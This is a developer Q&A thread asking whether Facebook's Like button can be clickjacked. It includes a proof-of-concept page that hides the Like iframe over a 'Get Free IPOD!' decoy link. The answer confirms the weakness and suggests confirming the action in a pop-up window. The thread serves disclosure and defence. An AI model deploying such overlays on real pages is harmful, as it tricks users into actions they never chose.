Reputation: 1172
Does facebook like button vulnerable to clickjacking?
Few days before I have read regarding clickjacking attack from http://javascript.info/tutorial/clickjacking . So today I tried with facebook like button. and It seems that i am successful in the experiment.
But i am not sure weather i am correct or not? This is the code snippet I have used.
<html>
<head>
<script>
window.fbAsyncInit = function() {
FB.init({
appId : '********',
xfbml : true,
version : 'v2.1'
});
};
(function(d, s, id){
var js, fjs = d.getElementsByTagName(s)[0];
if (d.getElementById(id)) {return;}
js = d.createElement(s); js.id = id;
js.src = "//connect.facebook.net/en_US/sdk.js";
fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));
</script>
<style>
iframe { /* iframe from facebook.com */
width:140px;
height:100px;
margin-top: 100px;
margin-left: 50px;
position:absolute;
top:0; left:0;
filter:alpha(opacity=50); /* in real life opacity=0 */
opacity:0.5;
}
.a{
margin-top: 95px;
}
</style>
</head>
<body>
<div class="a">
<a href="http://www.google.com" target="_blank" style="position:relative;left:20px;z-index:-1">Get Free IPOD!</a>
</div>
<iframe src="//www.facebook.com/plugins/like.php?href=https%3A%2F%2Fwww.facebook.com%2FTimesnow&width&layout=button&action=like&show_faces=false&share=false&height=35&appId=*****" scrolling="no" frameborder="0" style="border:none; overflow:hidden; height:35px;" allowTransparency="true"></iframe>
</body>
</html>
I can set the opacity of the iframe to 0 so that user can not see the fb like button when the user will click on the link , the attacker page will be automatically liked.
Example Fiddle: http://jsfiddle.net/5e5kvxk4/2/
Am I missing something? or facebook like button is really vulnerable ?
Upvotes: 5
Views: 3311
Answers (1)
Reputation: 33578
Yes, it probably is vulnerable to click jacking. There isn't a good solution to protect widgets from forged requests using current web technologies.
The widget will either be vulnerable to clickjacking or CSRF as explained here:
From "How to protect widgets from forged requests":
You don't want this [widget] to be vulnerable to CSRF so you write an iframe to the page. Based on the origin inheritance rules the parent site won't be able to read the CSRF token. However what about clickjacking (or likejacking )? Because of CSRF you must be within an iframe and there for the x-frame-options cannot help, and the same holds true for frame-busters
The best solution at present appears to be employing a pop up window in order to validate the click:
Clicking on the widget needs to open a pop-up window containing a new page -- an iframe is not good enough, it must be a new window -- which is entirely under the control of your web application. Confirm the action, whatever it is, on that page.
Yes, this is somewhat inelegant, but the present Web security architecture doesn't give you any better options.
Upvotes: 6
Related Questions
- Facebook like button on click
- Facebook "Like" button callback
- Facebook like button in site that uses post message spams console
- How does Facebook prevent triggering automatic clicks on Like buttons?
- Like button from Facebook
- Facebook like button is causing site to be insecure
- Facebook like button liking too much
- Facebook Like button and open graph
- Why doesn't the Facebook "Like" button honor its parameters when inserted via JavaScript?
- How to work Facebook 'Like' button